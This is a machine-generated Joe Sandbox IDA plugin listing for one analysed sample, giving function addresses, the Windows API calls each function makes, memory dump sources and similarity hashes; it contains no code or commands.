                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: HandleLoadModuleString$Message_wprintf
                            • String ID: %s (%d) : ==> %s: %s %s
                            • API String ID: 3648134473-3128320259
                            • Opcode ID: f6bbba5c08fefd1c10e1337d6ab0989537048d0d06c7d38e85876f0f636da310
                            • Instruction ID: c8f193ac401c9eed8fb7a4b83b39b846b3c6c379ae36074304b80794a373133b
                            • Opcode Fuzzy Hash: f6bbba5c08fefd1c10e1337d6ab0989537048d0d06c7d38e85876f0f636da310
                            • Instruction Fuzzy Hash: 090162F294030ABFEB5197A0DD89EFB776CDB08300F0005A5B745E2151EA749E854B75
                            Function 00DCD43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623
                            • GetSystemMetrics.USER32(0000000F), ref: 00DCD47C
                            • GetSystemMetrics.USER32(0000000F), ref: 00DCD49C
                            • MoveWindow.USER32(00000003,?,?,?,?,00000000), ref: 00DCD6D7
                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00DCD6F5
                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00DCD716
                            • ShowWindow.USER32(00000003,00000000), ref: 00DCD735
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00DCD75A
                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00DCD77D
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                            • String ID:
                            • API String ID: 1211466189-0
                            • Opcode ID: 83261e15acbb6fc5f7ea16d984578a9dbecf8771998df9878159254341706f41
                            • Instruction ID: 4e671e1c4088a064b3341feafddc12b54cf69e3f60ad519dfd9fc4dc528e170f
                            • Opcode Fuzzy Hash: 83261e15acbb6fc5f7ea16d984578a9dbecf8771998df9878159254341706f41
                            • Instruction Fuzzy Hash: 78B17B7160022AEFDF18CF68C985BA97BB2FF44701F188179ED499B295D734A990CB60
                            Function 00D42A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                            Download Yara Rule
                            APIs
                            • ShowWindow.USER32(FFFFFFFF,?), ref: 00D42ACF
                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00D42B17
                            • ShowWindow.USER32(FFFFFFFF,00000006), ref: 00D7C21A
                            • ShowWindow.USER32(FFFFFFFF,?), ref: 00D7C286
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ShowWindow
                            • String ID:
                            • API String ID: 1268545403-0
                            • Opcode ID: efb3b7d49875530be322a7dcec1a280a4b6b350439aa056445dca665e0335fff
                            • Instruction ID: e042dea83aec966c03064d5920b5b09d52370202634269acc4ff9e85d52f8120
                            • Opcode Fuzzy Hash: efb3b7d49875530be322a7dcec1a280a4b6b350439aa056445dca665e0335fff
                            • Instruction Fuzzy Hash: AB4107316147819FC7398B288C8EB7B7B92EB85320F9CC81DF88B96661C671D885D731
                            Function 00DA70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                            Download Yara Rule
                            APIs
                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00DA70DD
                              • Part of subcall function 00D60DB6: std::exception::exception.LIBCMT ref: 00D60DEC
                              • Part of subcall function 00D60DB6: __CxxThrowException@8.LIBCMT ref: 00D60E01
                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00DA7114
                            • EnterCriticalSection.KERNEL32(?), ref: 00DA7130
                            • _memmove.LIBCMT ref: 00DA717E
                            • _memmove.LIBCMT ref: 00DA719B
                            • LeaveCriticalSection.KERNEL32(?), ref: 00DA71AA
                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00DA71BF
                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00DA71DE
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                            • String ID:
                            • API String ID: 256516436-0
                            • Opcode ID: 45c00809a2a377c30d6c58d1f79ae3e742d0baa63124b2c6845a5dde2f446080
                            • Instruction ID: cdb6763733f9262e19764d554c44a1903481309a4065660dc32ba28f68d47914
                            • Opcode Fuzzy Hash: 45c00809a2a377c30d6c58d1f79ae3e742d0baa63124b2c6845a5dde2f446080
                            • Instruction Fuzzy Hash: EF313D71900206EBDB10DFA4DC85EAFBBB9EF45710F1441A5F904EB256DB709A14CBB4
                            Function 00DC61D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                            Download Yara Rule
                            APIs
                            • DeleteObject.GDI32(00000000), ref: 00DC61EB
                            • GetDC.USER32(00000000), ref: 00DC61F3
                            • GetDeviceCaps.GDI32(00000000,0000005A,?,?,00DC902A,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 00DC61FE
                            • ReleaseDC.USER32(00000000,00000000), ref: 00DC620A
                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00DC6246
                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00DC6257
                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00DC6291
                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00DC62B1
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                            • String ID:
                            • API String ID: 3864802216-0
                            • Opcode ID: 7559598e58bdac09fc9dd2eab40882c06668a2b9a031ed044e680552be4f5771
                            • Instruction ID: 90b88c31c9f1abc8a42c25961780ddc25d32645c52874032504a0de98e5bf2ce
                            • Opcode Fuzzy Hash: 7559598e58bdac09fc9dd2eab40882c06668a2b9a031ed044e680552be4f5771
                            • Instruction Fuzzy Hash: E3314C72241216BFEF118F50CC8AFEA3BAAEF49765F084065FE48DA291C6759C41CB74
                            Function 00D9BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _memcmp
                            • String ID:
                            • API String ID: 2931989736-0
                            • Opcode ID: 4901d27a6f65e45537e52302430d8c2d9d3f590fd0b760dbbb39b852e37ee46a
                            • Instruction ID: e9e8d1cfc6ff228836bbbeea3522f9e7138d9ca46aafb5331fcc36a6b4027b6f
                            • Opcode Fuzzy Hash: 4901d27a6f65e45537e52302430d8c2d9d3f590fd0b760dbbb39b852e37ee46a
                            • Instruction Fuzzy Hash: 5521A1A16012057BAB046621AE42FBB775DDE603ACF0E4023FD0497687EF64EE1582B1
                            Function 00DAEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                              • Part of subcall function 00D5FC86: _wcscpy.LIBCMT ref: 00D5FCA9
                            • _wcstok.LIBCMT ref: 00DAEC94
                            • _wcscpy.LIBCMT ref: 00DAED23
                            • _memset.LIBCMT ref: 00DAED56
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                            • String ID: X
                            • API String ID: 774024439-3081909835
                            • Opcode ID: 1872054092412eddbaceb05942929a8d5b18c8d40f621abd869441e842a11630
                            • Instruction ID: 5b8de7e2ad067fe60f7a210a3b0cc781340da360e46c9d9a82764319bed5c570
                            • Opcode Fuzzy Hash: 1872054092412eddbaceb05942929a8d5b18c8d40f621abd869441e842a11630
                            • Instruction Fuzzy Hash: 11C17D716087019FC764EF24C895A6AB7E4FF85310F04492DF8999B2A2DB70ED45CBB2
                            Function 00DB6B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                            Download Yara Rule
                            APIs
                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00DB6C00
                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00DB6C21
                            • WSAGetLastError.WSOCK32(00000000), ref: 00DB6C34
                            • htons.WSOCK32(?,?,?,00000000,?), ref: 00DB6CEA
                            • inet_ntoa.WSOCK32(?), ref: 00DB6CA7
                              • Part of subcall function 00D9A7E9: _strlen.LIBCMT ref: 00D9A7F3
                              • Part of subcall function 00D9A7E9: _memmove.LIBCMT ref: 00D9A815
                            • _strlen.LIBCMT ref: 00DB6D44
                            • _memmove.LIBCMT ref: 00DB6DAD
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                            • String ID:
                            • API String ID: 3619996494-0
                            • Opcode ID: 1e0dbd75d1ee52bf2e3dae2eb5b3f8e3732dbd36ba5621362fb26bb3c1e42a47
                            • Instruction ID: a95c4e4ecef877a80a28e09d5fa0267ec5187282c2379d88afbcb1d4c6337f3a
                            • Opcode Fuzzy Hash: 1e0dbd75d1ee52bf2e3dae2eb5b3f8e3732dbd36ba5621362fb26bb3c1e42a47
                            • Instruction Fuzzy Hash: 9081AC71204300ABC710EB24DC92EAFB7A9EF84714F544A19F9569B292DB74ED05CBB2
                            Function 00D41424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 403c4dccc2f3addbf817f582f36638444a13443870f3ee28d5154c2d768700a8
                            • Instruction ID: 84af1db775c9bea85a23b7a64cd2302767177a9ee5671eb55815a5923b24005f
                            • Opcode Fuzzy Hash: 403c4dccc2f3addbf817f582f36638444a13443870f3ee28d5154c2d768700a8
                            • Instruction Fuzzy Hash: 32715D34900209EFCB14CF98CC89EBEBB79FF85324F148159F919AA251D734AA91CB74
                            Function 00DCB351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                            Download Yara Rule
                            APIs
                            • IsWindow.USER32(00932440), ref: 00DCB3EB
                            • IsWindowEnabled.USER32(00932440), ref: 00DCB3F7
                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00DCB4DB
                            • SendMessageW.USER32(00932440,000000B0,?,?), ref: 00DCB512
                            • IsDlgButtonChecked.USER32(?,?,?,?), ref: 00DCB54F
                            • GetWindowLongW.USER32(00932440,000000EC), ref: 00DCB571
                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00DCB589
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                            • String ID:
                            • API String ID: 4072528602-0
                            • Opcode ID: 2d0bbbd8054a56d3d452354772cf3f41b7d06035ab571674ca90dd93a9c28b2c
                            • Instruction ID: 3f3d84d7e5e0fb00cd76edcc86f64330f95c87c021ead0d87e5bace0e9cbef0e
                            • Opcode Fuzzy Hash: 2d0bbbd8054a56d3d452354772cf3f41b7d06035ab571674ca90dd93a9c28b2c
                            • Instruction Fuzzy Hash: DB71AF34608646EFDB289F54C896FBA7BA5EF49320F18415EE941973A2C732E840DF70
                            Function 00DBF41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DBF448
                            • _memset.LIBCMT ref: 00DBF511
                            • ShellExecuteExW.SHELL32(?), ref: 00DBF556
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                              • Part of subcall function 00D5FC86: _wcscpy.LIBCMT ref: 00D5FCA9
                            • GetProcessId.KERNEL32(00000000), ref: 00DBF5CD
                            • CloseHandle.KERNEL32(00000000), ref: 00DBF5FC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                            • String ID: @
                            • API String ID: 3522835683-2766056989
                            • Opcode ID: 143bd68553a49b41290469683b87efcc04e990262db7d6987848cf790470c934
                            • Instruction ID: 9661a65c2fdfb78261104e11cdea43fc1bb5c6bdcf855ab3d8fc01a342d81502
                            • Opcode Fuzzy Hash: 143bd68553a49b41290469683b87efcc04e990262db7d6987848cf790470c934
                            • Instruction Fuzzy Hash: 70617975A00619DFCB14DF68C8919AEBBF5FF49310F148469E85AAB351CB31AD41CBB0
                            Function 00DA0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessagePost$KeyboardState$Parent
                            • String ID:
                            • API String ID: 87235514-0
                            • Opcode ID: 8a36316a1600670dcf162fc90ad80b3f169ba1ddd2d3451390c1b266ce255f29
                            • Instruction ID: d9f62dd04bef7bdb7f84883ba124bda867a7410f4c7c3b0cc25e26dab586deb2
                            • Opcode Fuzzy Hash: 8a36316a1600670dcf162fc90ad80b3f169ba1ddd2d3451390c1b266ce255f29
                            • Instruction Fuzzy Hash: 0451E1A06087D63DFB3642348C15BBABEA95F07304F0C8589E1D4968C2C3A9ECC8D775
                            Function 00DA0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessagePost$KeyboardState$Parent
                            • String ID:
                            • API String ID: 87235514-0
                            • Opcode ID: 6071a4082006d54755e8bc1652431f51bb85f53bb73cbf3a34875f1434f53c94
                            • Instruction ID: 483b5708c46ad7c1a620e82fa0ccaa42039d17aa1dbe48495cf5d804413d66fd
                            • Opcode Fuzzy Hash: 6071a4082006d54755e8bc1652431f51bb85f53bb73cbf3a34875f1434f53c94
                            • Instruction Fuzzy Hash: 2451D1A15447D63DFB3287648C45BBABEA9AB07300F0C8889F1D4968C2D395ED98E771
                            Function 00DA55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _wcsncpy$LocalTime
                            • String ID:
                            • API String ID: 2945705084-0
                            • Opcode ID: 748d5ccb729d0c877b6fceb2b6bc1ae22030cd21ca45590a7481e6c7611bf785
                            • Instruction ID: ad4e808d50989daab217adff6cf2bb7fd9d6c4dc96ec479083a8a244bab64899
                            • Opcode Fuzzy Hash: 748d5ccb729d0c877b6fceb2b6bc1ae22030cd21ca45590a7481e6c7611bf785
                            • Instruction Fuzzy Hash: 2E41A176C1061477CB11EBB89C869DFB3B8EF05310F508966E509E3261EB34A245C7BA
                            Function 00DA3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00DA466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DA3697,?), ref: 00DA468B
                              • Part of subcall function 00DA466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DA3697,?), ref: 00DA46A4
                            • lstrcmpiW.KERNEL32(?,?), ref: 00DA36B7
                            • _wcscmp.LIBCMT ref: 00DA36D3
                            • MoveFileW.KERNEL32 ref: 00DA36EB
                            • _wcscat.LIBCMT ref: 00DA3733
                            • SHFileOperationW.SHELL32(?), ref: 00DA379F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                            • String ID: \*.*
                            • API String ID: 1377345388-1173974218
                            • Opcode ID: 63f357531f217eadedcff6094a43fd68fd1bafcbe174475c0666fc253cfab145
                            • Instruction ID: e2afc20f575d246d4dc735e73d1c5e3bfe9fc7554aab4522ca64030d99179b55
                            • Opcode Fuzzy Hash: 63f357531f217eadedcff6094a43fd68fd1bafcbe174475c0666fc253cfab145
                            • Instruction Fuzzy Hash: C7418171508345AEC752EF64C4419DFB7E8EF8A340F48092EB49AC3251EB34D689CB72
                            Function 00DC7291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Menu$Item$DrawInfoInsert_memset
                            • String ID: 0
                            • API String ID: 3866635326-4108050209
                            • Opcode ID: c1e41078b07cf62a1fed3de339a13dda0fc4acf14a9a3267bf888909956aa582
                            • Instruction ID: 6d5fe652b28afef1007c279001b3615ae938bf28ef2fd820a6f42c447e1648fa
                            • Opcode Fuzzy Hash: c1e41078b07cf62a1fed3de339a13dda0fc4acf14a9a3267bf888909956aa582
                            • Instruction Fuzzy Hash: C5412675A0424AAFDB20DF50D884EAABBB9FB04350F188529FD65A7290D731AD50DF60
                            Function 00DC0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00DC0FD4
                            • RegOpenKeyExW.ADVAPI32 ref: 00DC0FFE
                            • FreeLibrary.KERNEL32(00000000), ref: 00DC10B5
                              • Part of subcall function 00DC0FA5: RegCloseKey.ADVAPI32(?), ref: 00DC101B
                              • Part of subcall function 00DC0FA5: FreeLibrary.KERNEL32(?), ref: 00DC106D
                              • Part of subcall function 00DC0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00DC1090
                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DC1058
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
